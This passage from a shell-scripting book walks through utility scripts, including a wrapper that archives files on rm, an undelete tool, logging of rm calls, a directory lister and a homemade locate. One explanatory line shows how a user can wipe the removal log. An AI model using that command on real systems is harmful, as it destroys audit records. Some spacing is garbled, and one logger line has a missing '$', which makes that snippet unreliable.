That's it: The close quote is missing. It's easily fixed, and we're ready to go:
$ hilow
./013-hilow.sh: line 7: unexpected EOF while looking for matching `)'
./013-hilow.sh: line 22: syntax error: unexpected end of file
Nope. Another problem. Because there are so few parenthesized expressions in the script, I can eyeball this problem
and ascertain that somehow the closing parenthesis of the instantiation of the random number was mistakenly
truncated, as the following line shows:
number=$(($$ % $biggest)      # random number, between 1 and $biggest
This is fixed by adding the closing parenthesis. Now are we ready to try this game? Let's find out:
$ hilow
Guess? 33
... bigger!
Guess? 66
... bigger!
Guess? 99
... bigger!
Guess? 100
... bigger!
Guess? ^C
Because 100 is the maximum possible value, there seems to be a logic error in the code. These errors are particularly
tricky because there's no fancy grep or sed invocation to identify the problem. Look back at the code and see if you
can identify what's going wrong.
To try and debug this, I'm going to add a few echo statements in the code to output the number chosen and verify that
what I entered is what's being tested. The relevant section of the code is
echo -n "Guess? " ; read answer
if [ "$guess" -lt $number ] ; then
In fact, as I modified the echo statement and looked at these two lines, I realized the error: The variable being read is
answer, but the variable being tested is called guess. A bonehead error, but not an uncommon one (particularly if
you have oddly spelled variable names). To fix this, I change read answer to read guess.

The Results
Finally, it works as expected.
$ hilow
Guess? 50
... bigger!
Guess? 75
... bigger!
Guess? 88
... smaller!
Guess? 83
... smaller!
Guess? 80
... smaller!
Guess? 77
... bigger!
Guess? 79
Right!! Guessed 79 in 7 guesses.

Hacking the Script


The most grievous bug lurking in this little script is that there's no checking of input. Enter anything at all other than an
integer and the script spews up bits and fails. Including a rudimentary test could be as easy as adding the following
lines of code:
if [ -z "$guess" ] ; then
  echo "Please enter a number. Use ^C to quit"; continue;
fi
However, a call to the validint function shown in Script #5 is what's really needed.

Chapter 2: Improving on User Commands


Overview
A typical Unix or Linux system includes hundreds of commands, which, when you factor in starting flags and the
combinations of commands possible with pipes, should produce millions of different ways to work on the command line.
Plenty of choices for anyone, right? Well, no. In fact, for all its flexibility, you can't always get what you want.
Unlike other operating systems, however, with Unix you can usually cobble together something that'll do the trick quite
easily, whether it's downloading some nifty new version of a utility with additional capabilities (particularly from the great
GNU archive at http://www.gnu.org/), creating some aliases, or dipping your toe into the shell scripting pond.
But before we go any further, here's a bonus script. If you're curious about how many commands are in your PATH,
this simple shell script will do the trick:
#!/bin/sh

# How many commands: a simple script to count how many executable
#   commands are in your current PATH.

myPATH="$(echo $PATH | sed -e 's/ /~~/g' -e 's/:/ /g')"
count=0 ; nonex=0

for dirname in $myPATH ; do
  directory="$(echo $dirname | sed 's/~~/ /g')"
  if [ -d "$directory" ] ; then
    for command in $(ls "$directory") ; do
      if [ -x "$directory/$command" ] ; then
        count="$(($count + 1))"
      else
        nonex="$(($nonex + 1))"
      fi
    done
  fi
done

echo "$count commands, and $nonex entries that weren't executable"

exit 0
This script counts the number of executable files, rather than just the number of files, and reveals that Red Hat Linux 8
ships with 1,203 commands and 4 nonexecutables in a standard PATH, Mac OS X (10.2, with the developer options
installed) has 1,088 commands and 25 nonexecutables, and Solaris 9 has an impressive 1,700 commands with 42
nonexecutables in the default PATH.
The scripts explored in this chapter are all similar to the simple script just given in that they add fun or useful features
and capabilities without an overly high degree of complexity. Some of the scripts accept different command flags to
allow even greater flexibility, and some also demonstrate how a shell script can be used as a wrapper, a program that
intercedes to allow users to specify commands or command flags in a familiar notation and then translates those flags
into the proper format and syntax required by the actual Unix command.
There's no question that the different flavors of Linux and Unix offer a large number of commands and executable
scripts. Do we really need to add new ones? The answer is really based on the entire Unix philosophy: Unix is built
upon the idea that commands should do one thing, and do it well. Word processors that have spell-check, find-file, and
email capabilities might work well in the Windows and Macintosh world, but on the command line, each of these
functions should be separate and discrete. There are lots of advantages to this strategy, the most important being that
each function can then be modified and extended individually, giving all applications that utilize it access to its new
capabilities.
This strategy holds true across the board with Unix, and that's why the scripts in this chapter and throughout the
book not only are helpful, but are a logical extension of the entire Unix philosophy. After all, 'tis better to extend and
expand than to build complex, incompatible versions of commands for your own installation.

#14 Formatting Long Lines


If you're lucky, your Unix system already includes the fmt command, a program that's remarkably useful if you work
with text with any frequency. From reformatting email to filling in paragraphs in documents (that is, making sure that as
many words as possible are on each line of the text), fmt is a helpful utility to know.
But some Unix systems don't include fmt, particularly legacy systems at universities, which often have a fairly
minimalistic implementation. As it turns out, the nroff command, which has been part of Unix since the very
beginning, can be utilized in a short shell script to achieve the same result of wrapping long lines and filling in short
lines to even up line lengths.

The Code
#!/bin/sh

# A version of fmt, using nroff. Adds two useful flags: -w X for line width
#   and -h to enable hyphenation for better fills.

while getopts "hw:" opt; do
  case $opt in
    h ) hyph=1           ;;
    w ) width="$OPTARG"  ;;
  esac
done
shift $(($OPTIND - 1))

nroff << EOF
.ll ${width:-72}
.na
.hy ${hyph:-0}
.pl 1
$(cat "$@")
EOF

exit 0

How It Works
This succinct script offers two different command flags, -w X to specify that lines should be wrapped when their width
exceeds X characters (the default is 72) and -h to enable hyphenation, filling the lines more and improving the final
results. Notice the test to check for starting flags: A while loop uses getopts to step through the options, then
uses shift $(($OPTIND - 1)) to throw all the arguments away once they've been processed.
The other, perhaps more important technique demonstrated here is the use of a here document to feed multiple lines
of input to a command. The odd double-input-redirect sequence nroff << EOF allows you to easily have a here
document, a section of the script that's treated as if it were typed in on the command line. Using the here document, the
script outputs all of the necessary nroff commands and then calls the cat command with the requested filename or
filenames to process. The cat command's output is then fed directly to nroff. This is a technique that will appear
frequently in the scripts presented in this book, and it's one well worth experimenting with!
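As a standalone illustration of the here-document idea, separate from the nroff script (the variable names below are invented): everything between << EOF and the closing EOF line becomes the command's standard input, after variable and $( ) substitution have been performed.

```shell
#!/bin/sh
# Feed three lines to wc -l via a here document; both $name and the
# $( ) command substitution are expanded before wc sees the input.
name="world"
lines=$(wc -l << EOF
hello $name
this is the second line of input
$(echo "this third line comes from a command substitution")
EOF
)
echo "the here document contained $lines lines"
```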

Running the Script


This script can be included in a pipe, or it can have filenames specified on the command line, but usually it would be
part of an external pipe invoked from within an editor like vi or vim (e.g., !}fmt) to format a paragraph of text.

The Results
The following example enables hyphenation and specifies a maximum width of 50 characters:
$ fmt -h -w 50 014-ragged.txt
So she sat on, with closed eyes, and half believed
herself in Wonderland, though she knew she had but
to open them again, and all would change to dull
reality--the grass would be only rustling in the
wind, and the pool rippling to the waving of the
reeds--the rattling teacups would change to tin-
kling sheep-bells, and the Queen's shrill cries
to the voice of the shepherd boy--and the sneeze
of the baby, the shriek of the Gryphon, and all
the other queer noises, would change (she knew) to
the confused clamour of the busy farm-yard--while
the lowing of the cattle in the distance would
take the place of the Mock Turtle's heavy sobs.
Compare this with the following output, generated using the default width and no hyphenation:
$ fmt 014-ragged.txt
So she sat on, with closed eyes, and half believed herself in
Wonderland, though she knew she had but to open them again, and all
would change to dull reality--the grass would be only rustling in the
wind, and the pool rippling to the waving of the reeds--the rattling
teacups would change to tinkling sheep-bells, and the Queen's shrill
cries to the voice of the shepherd boy--and the sneeze of the baby, the
shriek of the Gryphon, and all the other queer noises, would change (she
knew) to the confused clamour of the busy farm-yard--while the lowing of
the cattle in the distance would take the place of the Mock Turtle's
heavy sobs.

#15 Archiving Files As They're Removed


One of the most common problems that users have with Unix, in my experience, is that there is no way to recover a file
or folder that has been accidentally removed. No Norton Unerase, no Mac OS X shareware utility, nada. Once you
press RETURN after typing rm xyz, it's history.
A solution to this problem is to secretly and automatically archive files and directories to a .deleted-files
archive. With some fancy footwork in a script, this can be made almost completely invisible to users.

The Code
#!/bin/sh

# newrm, a replacement for the existing rm command, provides a
#   rudimentary unremove capability by creating and utilizing a new
#   directory within the user's home directory. It can handle directories
#   of content as well as individual files, and if the user specifies
#   the -f flag files are removed and NOT archived.

# Big Important Warning: You'll want a cron job or something similar to keep
#   the trash directories tamed. Otherwise nothing will ever actually
#   be deleted from the system and you'll run out of disk space!

mydir="$HOME/.deleted-files"
realrm="/bin/rm"
copy="/bin/cp -R"

if [ $# -eq 0 ] ; then          # let 'rm' output the usage error
  exec $realrm                  # our shell is replaced by /bin/rm
fi

# Parse all options looking for '-f'

flags=""

while getopts "dfiPRrvW" opt
do
  case $opt in
    f ) exec $realrm "$@"     ;;    # exec lets us exit this script directly.
    * ) flags="$flags -$opt"  ;;    # other flags are for 'rm', not us
  esac
done
shift $(($OPTIND - 1))

# Make sure that the $mydir exists

if [ ! -d $mydir ] ; then
  if [ ! -w $HOME ] ; then
    echo "$0 failed: can't create $mydir in $HOME" >&2
    exit 1
  fi
  mkdir $mydir
  chmod 700 $mydir              # a little bit of privacy, please
fi

for arg
do
  newname="$mydir/$(date "+%S.%M.%H.%d.%m").$(basename "$arg")"
  if [ -f "$arg" ] ; then
    $copy "$arg" "$newname"
  elif [ -d "$arg" ] ; then
    $copy "$arg" "$newname"
  fi
done

exec $realrm $flags "$@"        # our shell is replaced by realrm

How It Works
There are a bunch of cool things to consider in this script, not the least of which is the significant effort it goes through
to ensure that users aren't aware it exists. Notice that error messages are almost always generated by a call to
r ea lrm with whatever bad flags or file/directory names were specified. Also, the ex ec command, which replaces the
current process with the new process specified, is a convenience. As soon as e xe c invokes r e al rm , it effectively
exits the script, and we have the added side benefit of ensuring that the return code from the re al r m process
(/ bin / rm) is given to the invoking shell, not lost.
Because this script secretly creates a directory in the user's home directory, it needs to ensure that the files therein
aren't suddenly readable by others simply because of a badly set um as k value. To accomplish this, the script uses
c hm od to ensure that the directory is set to read+write+execute for the user, and closed for everyone else.
Finally, the somewhat confusing file-naming convention uses bas e na m e to strip out any directory information from the
file's path, and adds a time and date stamp to every deleted file in the form second.minute.hour.day.month.filename:
n ew nam e ="$ my dir /$ (dat e "+ "%S.% M .%H . % d.% m " ). $( ba s en am e " $ ar g" ) "
Notice the use of multiple $() elements in the same substitution. It's a bit complicated, perhaps, but helpful
nonetheless. Remember, anything between $ ( and) is fed to a subshell, and the result of that command is what's
substituted. Why bother with a timestamp? To enable our archive to store multiple files that could potentially have the
same name prior to being deleted.

Running the Script


To install this script, simply add an alias, so that when you type rm you really get to this script, not to the /bin/rm
command. A Bash/Ksh alias would look like this:
alias rm=yourpath/newrm

The Results
The results of running this script are subtle and hidden from immediate view, so let's keep an eye on the .deleted-files directory along the way:
$ ls ~/.deleted-files
ls: /Users/taylor/.deleted-files/: No such file or directory
$ newrm file-to-keep-forever
$ ls ~/.deleted-files/
51.36.16.25.03.file-to-keep-forever
Exactly right. While the file was deleted from the local directory, a copy of it was secretly squirreled away to the
.deleted-files directory, with an appropriate date/time stamp to allow other deleted files with the same name to
be stored in the same directory.

#16 Working with the Removed File Archive


Now that a directory of deleted files and directories is hidden within the user's account home, a script to let the user
pick and choose between these deleted files would clearly be useful. However, it's quite a task to address all the
possible situations, ranging from no matches to one match to more than one match. In the case of more than one
match, for example, do you automatically pick the newest file to undelete? Indicate how many matches there are and
quit? Present data on the different versions and let the user pick? Let's see what we can do....

The Code
#!/bin/sh

# unrm - Searches the deleted files archive for the specified file or directory.
#   If there is more than one matching result, shows a list of the results,
#   ordered by timestamp, and lets the user specify which one to restore.

mydir="$HOME/.deleted-files"
realrm="/bin/rm"
move="/bin/mv"

dest=$(pwd)

if [ ! -d $mydir ] ; then
  echo "$0: No deleted files directory: nothing to unrm" >&2 ; exit 1
fi

cd $mydir

if [ $# -eq 0 ] ; then  # no args, just show listing
  echo "Contents of your deleted files archive (sorted by date):"
  ls -FC | sed -e 's/\([[:digit:]][[:digit:]]\.\)\{5\}//g' \
    -e 's/^/  /'
  exit 0
fi

# Otherwise we must have a user-specified pattern to work with. Let's see if the
# pattern matches more than one file or directory in the archive.

matches="$(ls *"$1" 2> /dev/null | wc -l)"

if [ $matches -eq 0 ] ; then
  echo "No match for \"$1\" in the deleted file archive." >&2
  exit 1
fi

if [ $matches -gt 1 ] ; then
  echo "More than one file or directory match in the archive:"
  index=1
  for name in $(ls -td *"$1")
  do
    datetime="$(echo $name | cut -c1-14 | \
      awk -F. '{ print $5"/"$4" at "$3":"$2":"$1 }')"
    if [ -d $name ] ; then
      size="$(ls $name | wc -l | sed 's/[^[:digit:]]//g')"
      echo " $index)   $1  (contents = ${size} items, deleted = $datetime)"
    else
      size="$(ls -sdk1 $name | awk '{print $1}')"
      echo " $index)   $1  (size = ${size}Kb, deleted = $datetime)"
    fi
    index=$(($index + 1))
  done

  echo ""
  echo -n "Which version of $1 do you want to restore ('0' to quit)? [1] : "
  read desired

  if [ ${desired:=1} -ge $index ] ; then
    echo "$0: Restore canceled by user: index value too big." >&2
    exit 1
  fi

  if [ $desired -lt 1 ] ; then
    echo "$0: restore canceled by user." >&2 ; exit 1
  fi

  restore="$(ls -td1 *"$1" | sed -n "${desired}p")"

  if [ -e "$dest/$1" ] ; then
    echo "\"$1\" already exists in this directory. Cannot overwrite." >&2
    exit 1
  fi

  echo -n "Restoring file \"$1\" ... "
  $move "$restore" "$dest/$1"
  echo "done."

  echo -n "Delete the additional copies of this file? [y] "
  read answer

  if [ ${answer:=y} = "y" ] ; then
    $realrm -rf *"$1"
    echo "deleted."
  else
    echo "additional copies retained."
  fi
else
  if [ -e "$dest/$1" ] ; then
    echo "\"$1\" already exists in this directory. Cannot overwrite." >&2
    exit 1
  fi

  restore="$(ls -d *"$1")"

  echo -n "Restoring file \"$1\" ... "
  $move "$restore" "$dest/$1"
  echo "done."
fi

exit 0

How It Works
The first chunk of code, the if [ $# -eq 0 ] conditional block, executes if no arguments are specified, displaying
the contents of the deleted files archive. However, there's a catch: we can't display the actual filenames, because we
don't want the user to see the timestamp data used internally to guarantee unique filenames. In order to display this
data in a more attractive format, the sed statement deletes the first five occurrences of digit digit dot in the ls output.
If an argument is specified, it is the name of a file or directory to recover. The next step is to ascertain how many
matches there are for the name specified. This is done with the following statement:
matches="$(ls *"$1" 2> /dev/null | wc -l)"
The unusual use of quotes in the argument to ls ensures that this pattern will match filenames that have embedded
spaces, while the '*' wildcard pattern is expanded properly by the shell. The 2> /dev/null ensures that any
error resulting from the command is discarded rather than shown to the user. The error that's being discarded is most
likely No such file or directory, caused when no match for the specified filename is found.
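That quoting behavior is easy to rehearse in isolation. Here's a small sketch (the timestamped filenames are invented for the demo, mimicking the archive's secs.mins.hrs.day.month prefix):

```shell
#!/bin/sh
# Demo: count archive entries whose names end in a given (possibly
# space-containing) suffix, using the *"$1"-style quoting.
demo=$(mktemp -d) && cd "$demo"

touch "10.29.30.11.14.my notes"     # hypothetical timestamped copies,
touch "51.12.30.11.29.my notes"     # spaces and all

pattern="my notes"
# *"$pattern": the * is expanded by the shell, but the user-supplied
# part stays quoted, so the embedded space survives intact.
matches="$(ls *"$pattern" 2> /dev/null | wc -l)"
echo "matches: $matches"            # both files match

cd / && rm -rf "$demo"
```

Had the pattern been left unquoted, the shell would have split "my notes" into two words and the glob would have failed.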
If there are multiple matches for the file or directory name specified, the most complex part of this script, the if [
$matches -gt 1 ] block, is executed, displaying all the results. Using the -t flag to the ls command in the
main for loop causes the archive files to be presented from newest to oldest, and a succinct call to the awk
command translates the date/time stamp portion of the filename into the deleted date and time information in the
parentheses. The inclusion of the -k flag to ls in the size calculation forces the file sizes to be represented in
kilobytes:
size="$(ls -sdk1 $name | awk '{print $1}')"
Rather than displaying the size of matching directory entries, which would be meaningless, the script displays the
number of files within each matching directory. The number of entries within a directory is actually quite easy to
calculate, and we chop the leading spaces out of the wc command output, as follows:
size="$(ls $name | wc -l | sed 's/[^[:digit:]]//g')"
Once the user specifies one of the possible matching files or directories, the corresponding exact filename is identified
by the following statement:
restore="$(ls -td1 *"$1" | sed -n "${desired}p")"
This statement contains a slightly different use of sed. Specifying the -n flag and then a number (${desired})
followed by the p print command is a very fast way to extract only the specified line number from the input stream.
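The same idiom works on any stream. A quick sketch:

```shell
#!/bin/sh
# Extract just the Nth line of a stream: -n suppresses sed's default
# output, and the address N plus the p command prints only that line.
desired=3
third="$(printf 'alpha\nbeta\ngamma\ndelta\n' | sed -n "${desired}p")"
echo "$third"
```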
The rest of the script should be fairly self-explanatory. There's a test to ensure that unrm isn't going to step on an
existing copy of the file or directory, and then the file or directory is restored with a call to /bin/mv. Once that's
finished, the user is given the chance to remove the additional (probably superfluous) copies of the file, and the script is
done.

Running the Script


There are two ways to work with this script. First, without any arguments, it'll show a listing of all files and directories in
the deleted files archive for the specific user. Second, with a desired file or directory name as the argument, the script
will either restore that file or directory (if there's only one match) or show a list of candidates for restoration, allowing
the user to specify which version of the deleted file or directory to restore.

The Results
Without any arguments specified, the script shows what's in the deleted files archive:
$ unrm
Contents of your deleted files archive (sorted by date):
   deitrus        this is a test
   deitrus        garbage
When a filename is specified, the script displays more information about the file, as follows:
$ unrm deitrus
More than one file or directory match in the archive:
 1)   deitrus  (size = 7688Kb, deleted = 11/29 at 10:00:12)
 2)   deitrus  (size = 4Kb, deleted = 11/29 at 09:59:51)
Which version of deitrus do you want to restore ('0' to quit)? [1] : 0
unrm: restore canceled by user.

Hacking the Script


If you implement this script, there's a lurking danger that's worth raising. Without any controls or limits, the files and
directories in the deleted files archive will grow without bounds. To avoid this, invoke find from within a cron job to
prune the deleted files archive. A 14-day archive is probably quite sufficient for most users and will keep things
reasonably in check.
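One sketch of such a pruning script follows; the 14-day cutoff and cron schedule are only the suggestion above, and the -mindepth/-maxdepth flags assume GNU find:

```shell
#!/bin/sh
# Prune entries older than 14 days from the deleted files archive.
# Hypothetical cron line to run it nightly at 3:15 a.m.:
#    15 3 * * * $HOME/bin/prunedeleted
archive="$HOME/.deleted-files"

if [ -d "$archive" ] ; then
  # -mtime +14: last modified more than 14 days ago.
  # -mindepth/-maxdepth (GNU find) keep us at the archive's top level
  # so rm -rf removes each stale entry, directories included.
  find "$archive" -mindepth 1 -maxdepth 1 -mtime +14 -exec rm -rf {} \;
fi
```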

#17 Logging File Removals


This script is an example of an entire class of useful shell scripts called wrappers. The basic idea of wrappers is that
they live between an actual Unix command and the user, offering the user different and useful functionality not available
with the actual command alone. In the case of this script, file deletions using the rm command will actually be logged in
a separate log file without notifying the user.

The Code
#!/bin/sh

# logrm - Logs all file deletion requests unless the -s flag is used.

removelog="/var/log/remove.log"

if [ $# -eq 0 ] ; then
  echo "Usage: $0 [-s] list of files or directories" >&2
  exit 1
fi

if [ "$1" = "-s" ] ; then
  # silent operation requested ... don't log
  shift
else
  echo "$(date): ${USER}: $@" >> $removelog
fi

/bin/rm "$@"

exit 0

Running the Script


Rather than give this script a name like logrm, a typical way to install a wrapper program is to rename the underlying
program and then install the wrapper using the underlying program's old name. If you choose this route, make sure that
the wrapper invokes the newly renamed program, not itself. For example, if you rename /bin/rm to /bin/rm.old
and name this script /bin/rm, the last few lines of the script will need to be changed so that it invokes
/bin/rm.old, not itself!
You can also use an alias to have this script wrap a standard call to rm:
alias rm=logrm
In either case, you will, of course, need write and execute access to /var/log, which might not be the default
configuration on your particular Unix or Mac OS X system.
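The rename-and-wrap install can be rehearsed safely before touching /bin. This sketch performs both steps in a scratch directory with a stand-in rm; the log path and stand-in are invented for the demo, and the real install must of course be done as root:

```shell
#!/bin/sh
# Rehearse the rename-and-wrap install in a scratch bin directory.
bin=$(mktemp -d)

printf '#!/bin/sh\necho "real rm: $@"\n' > "$bin/rm"   # stand-in for /bin/rm
chmod 755 "$bin/rm"

mv "$bin/rm" "$bin/rm.old"          # step 1: preserve the original command

cat > "$bin/rm" << 'EOF'            # step 2: install wrapper under old name
#!/bin/sh
# minimal logrm-style wrapper: it must invoke rm.old, never itself!
echo "$(date): ${USER:-$LOGNAME}: $@" >> "${RMLOG:-/tmp/remove.demo.log}"
exec "$(dirname "$0")/rm.old" "$@"
EOF
chmod 755 "$bin/rm"

"$bin/rm" some.file                 # runs the wrapper, which logs and chains
```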

The Results
Let's create a few files to delete, delete them, and then examine the remove log:
$ touch unused.file ciao.c /tmp/junkit
$ logrm unused.file /tmp/junkit
$ logrm ciao.c
$ cat /var/log/remove.log
Thu Jul  3 11:32:05 MDT 2003: susan: /tmp/central.log
Fri Jul  4 14:25:11 MDT 2003: taylor: unused.file /tmp/junkit
Fri Jul  4 14:25:14 MDT 2003: taylor: ciao.c
Aha! Notice that on the previous day user susan deleted the file /tmp/central.log.

Hacking the Script


There's a potential log file ownership permission problem here too. Either the remove.log file is writable by all, in
which case a user could clear its contents out with a command like cat /dev/null > /var/log/remove.log,
or it isn't writable by all, in which case the script can't log the events. You could use a
setuid permission so that the script runs with the same permissions as the log file, but there are two problems with
this. First, it's a really bad idea! Never run shell scripts under setuid! Second, if that's not enough of a reason, you
could get into a situation where the users have permission to delete their files but the script doesn't, and because the
effective uid set with the setuid would be inherited by the rm command itself, things would break and there would
be great confusion when users couldn't remove their own files, even when they check and see that they own the files in
question.
Two other possible solutions to this problem are worth mentioning. First, if you have an ext2 or ext3 file system
(probably Linux), you can use the chattr command to set a specific append-only file permission on the log file and
then leave it writable to all without any danger. Second, you can write the log messages to syslog, using the helpful
logger command. To log the rm commands with logger is straightforward:
logger -t logrm "${USER:-LOGNAME}: $*"
This adds an entry to the syslog data stream (untouchable by regular users) that is tagged with logrm, the
username, and the command specified.
Syslog nuances to watch for

If you opt for this approach, you'll want to check syslogd(8) to ensure that your configuration doesn't discard
user.notice priority log events (it's almost always specified in the /etc/syslog.conf file).

#18 Displaying the Contents of Directories


While the ls command is a cornerstone of working with the Unix command line, there's one element of the command
that's always seemed pointless to me: indicating the size of a directory. When a directory is listed, the program either
lists the directory's contents file by file or shows the number of 1,024-byte blocks required for the directory data. A
typical entry in an ls -l output might be
drwxrwxr-x    2 taylor   taylor       4096 Oct 28 19:07 bin
But that's really not very useful, because what I want to know is how many files are in the specified directory. That's
what this script accomplishes, generating a nice multicolumn listing of files and directories that shows file size with file
entries and the number of files with directory entries.

The Code
#!/bin/sh

# formatdir - Outputs a directory listing in a friendly and useful format.

gmk()
{
  # Given input in Kb, output in Kb, Mb, or Gb for best output format
  if [ $1 -ge 1000000 ] ; then
    echo "$(scriptbc -p 2 $1 / 1000000)Gb"
  elif [ $1 -ge 1000 ] ; then
    echo "$(scriptbc -p 2 $1 / 1000)Mb"
  else
    echo "${1}Kb"
  fi
}

if [ $# -gt 1 ] ; then
  echo "Usage: $0 [dirname]" >&2; exit 1
elif [ $# -eq 1 ] ; then
  cd "$@"
fi

for file in *
do
  if [ -d "$file" ] ; then
    size=$(ls "$file" | wc -l | sed 's/[^[:digit:]]//g')
    if [ $size -eq 1 ] ; then
      echo "$file ($size entry)|"
    else
      echo "$file ($size entries)|"
    fi
  else
    size="$(ls -sk "$file" | awk '{print $1}')"
    echo "$file ($(gmk $size))|"
  fi
done | \
  sed 's/ /^^^/g' | \
  xargs -n 2 | \
  sed 's/\^\^\^/ /g' | \
  awk -F\| '{ printf "%-39s %-39s\n", $1, $2 }'

exit 0

How It Works
One of the most interesting parts of this script is the gmk function, which, given a number in kilobytes, outputs that
value in kilobytes, megabytes, or gigabytes, depending on which unit is most appropriate. Instead of having the size of
a very large file shown as 2083364KB, for example, this function will instead show a size of 2.08GB. Note that gmk is
called with the $() notation in the following line:
echo "$file ($(gmk $size))|"
The command within the $() sequence runs in a subshell of the running script shell, and because subshells
automatically inherit any functions defined in the running shell, gmk is available there.
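That inheritance can be demonstrated in two lines (a toy stand-in for the real gmk):

```shell
#!/bin/sh
# Functions defined in the current script are visible inside $( )
# command substitutions, which run in a subshell of this same shell.
gmk() { echo "${1}Kb" ; }

label="$(gmk 42)"       # gmk is callable inside the substitution
echo "size is $label"
```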
Near the top of the script, there is also a shortcut that allows users to specify a directory other than the current
directory and then changes the current working directory of the running shell script to the desired location, using cd.
This follows the mantra of good shell script programming, of course: Where there's a shortcut, there's a better way.
The main logic of this script involves organizing the output into two neat, aligned columns. You can't make a break at
spaces in the output stream, because files and directories can have spaces within their names. To get around this
problem, the script first replaces each space with a sequence of three carets (^^^). Then it uses the xargs command
to merge paired lines so that every two lines become one line separated by a space. Finally, it uses the awk command
(rather than paste, which would just intersperse a tab, which rarely, if ever, works out properly because paste
doesn't take into account variation in entry width) to output columns in the proper alignment.
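The space-hiding pipeline can be watched in isolation (the two entries are invented for the demo):

```shell
#!/bin/sh
# Protect embedded spaces as ^^^, let xargs -n 2 join every two lines
# into one, then restore the spaces.
paired="$(printf 'My Documents (2 entries)|\nbin (31 entries)|\n' | \
  sed 's/ /^^^/g' | xargs -n 2 | sed 's/\^\^\^/ /g')"
echo "$paired"
```

Without the caret substitution, xargs would treat "My" and "Documents" as separate arguments and scramble the pairing.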
Notice how the number of (nonhidden) entries in a directory is easily calculated, with a quick sed invocation cleaning
up the output of the wc command:
size=$(ls "$file" | wc -l | sed 's/[^[:digit:]]//g')

Running the Script


For a listing of the current directory, invoke the command without arguments. For information about the contents of a
particular directory, specify a directory name as the sole command argument.

The Results
$ formatdir ~
Applications (0 entries)               Classes (4Kb)
DEMO (5 entries)                       Desktop (8 entries)
Documents (38 entries)                 Incomplete (9 entries)
Intermediate HTML (3 entries)          Library (38 entries)
Movies (1 entry)                       Music (1 entry)
NetInfo (9 entries)                    Pictures (38 entries)
Public (1 entry)                       RedHat 7.2 (2.08Gb)
Shared (4 entries)                     Synchronize! Volume ID (4Kb)
XDesktop (4Kb)                         automatic-updates.txt (4Kb)
bin (31 entries)                       cal-liability.tar.gz (104Kb)
cbhma.tar.gz (376Kb)                   errata (2 entries)
fire aliases (4Kb)                     games (3 entries)
junk (4Kb)                             leftside navbar (39 entries)
mail (2 entries)                       perinatal.org (0 entries)
scripts.old (46 entries)               test.sh (4Kb)
testfeatures.sh (4Kb)                  topcheck (3 entries)
tweakmktargs.c (4Kb)                   websites.tar.gz (18.85Mb)

Hacking the Script


The GNU version of ls has an -h flag that offers similar functionality. If you have that version of ls available, adding
that flag and removing the call to gmk will speed up this script.
The other issue worth considering with this script is whether you happen to have a user who likes to use sequences of
three carets in filenames, which could cause some confusion in the output. This naming convention is pretty unlikely,
however. A 116,696-file Linux install that I spot-tested didn't have even a single caret within any of its filenames.
However, if you really are concerned, you could address this potential pitfall by translating spaces into another
sequence of characters that's even less likely to occur in user filenames.

#19 Locating Files by Filename


One command that's quite useful on Linux systems, but isn't always present on other Unixes, is locate, which
searches a prebuilt database of filenames for the specified regular expression. Ever want to quickly find the location of
the master .cshrc file? Here's how that's done with locate:
$ locate .cshrc
/.Trashes/501/Previous Systems/private/etc/csh.cshrc
/OS 9 Snapshot/Staging Archive/:home/taylor/.cshrc
/private/etc/csh.cshrc
/Users/taylor/.cshrc
/Volumes/110GB/WEBSITES/staging.intuitive.com/home/mdella/.cshrc
You can see that the master .cshrc file is in the /private/etc directory on this Mac OS X system. The
locate system sees every file on the disk when building its internal file index, whether the file is in the trash queue, is
on a separate volume, or is even a hidden dot file. This is a plus and a minus, as I will discuss shortly.
This method of finding files is simple to implement and comes in two parts. The first part builds the database of all
filenames by invoking find, and the second is a simple grep of the new database.

The Code
#!/bin/sh

# mklocatedb - Builds the locate database using find. Must be root
#    to run this script.

locatedb="/var/locate.db"

if [ "$(whoami)" != "root" ] ; then
  echo "Must be root to run this command." >&2
  exit 1
fi

find / -print > $locatedb

exit 0
The second script is even shorter:
#!/bin/sh

# locate - Searches the locate database for the specified pattern.

locatedb="/var/locate.db"

exec grep -i "$@" $locatedb

How It Works
The mklocatedb script must be run as the root user, something easily checked with a call to whoami, to ensure
that it can see all the files in the entire system. Running any script as root, however, is a security problem, because if a
directory is closed to a specific user's access, the locate database shouldn't store any information about the
directory or its contents either. This issue will be addressed in the next chapter with a new secure locate script that
takes privacy and security into account. For now, however, this script exactly emulates the behavior of the locate
command in standard Linux, Mac OS X, and other distributions.
Don't be surprised if mklocatedb takes a few minutes or longer to run; it's traversing the entire file system, which
can take a while on even a medium-sized system. The results can be quite large too. On my Mac OS X reference
system, the locate.db file has over 380,000 entries and eats up 18.3MB of disk space. Once the database is built,
the locate script itself is a breeze to write, as it's just a call to the grep command with whatever arguments are
specified by the user.

Running the Script

To run the locate script, it's first necessary to run the mklocatedb script. Once that's done (and it can take a
while to complete), locate invocations will ascertain all matching files on the system for any pattern specified.

The Results
The mklocatedb script has no arguments or output:
$ sudo mklocatedb
Password:
$
You can see how large the database file is with a quick ls:
$ ls -l /var/locate.db
-rw-r--r--  1 root  wheel  42384678 Mar 26 10:02 /var/locate.db
To find files on the system now, use locate:
$ locate -i gammon
/OS 9/Applications (Mac OS 9)/Palm/Users/Dave Taylor/Backups/Backgammon.prc
/Users/taylor/Documents/Palm/Users/Dave Taylor/Backups/Backgammon.prc
/Users/taylor/Library/Preferences/Dave's Backgammon Preferences
/Volumes/110GB/Documents/Palm/Users/Dave Taylor/Backups/Backgammon.prc
This script also lets you ascertain other interesting statistics about your system, such as how many C source files you
have:
$ locate '\.c' | wc -l
381666
That's quite a few! With a bit more work, I could feed each one of these C source files to the wc command to ascertain
the total number of lines of C code on the box, but, um, that would be kinda daft, wouldn't it?

Hacking the Script


To keep the database reasonably current, it'd be easy to schedule an invocation of mklocatedb to run from cron
in the wee hours of the night, or even more frequently based on local usage patterns. As with any script executed by
the root user, care must be taken to ensure that the script itself isn't editable by nonroot users.
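Such a cron entry might look like this (a sketch; the installed path of the script is an assumption):

```
# root's crontab: rebuild the locate database nightly at 4:15 a.m.
15 4 * * * /usr/local/bin/mklocatedb
```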
The most obvious potential improvement to this script would cause locate to check its arguments and fail with a
meaningful error message if no pattern is specified; as it's written now, it'll spit out a grep command error instead,
which isn't that great. More importantly, as I discussed earlier, there's a significant security issue surrounding letting
users have access to a listing of all filenames on the system, even those they wouldn't ordinarily be able to see. A
security improvement to this script is addressed in Script #43, Implementing a Secure Locate.
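The argument check, at least, is a quick fix. Here's a sketch, restructured as a function with an overridable database path purely so it is easy to exercise; the real script would stay a standalone file using exec as before:

```shell
#!/bin/sh
# locate with a usage message when no pattern is given. The database
# path can be overridden via LOCATEDB (a testing convenience, not part
# of the original script).
locate()
{
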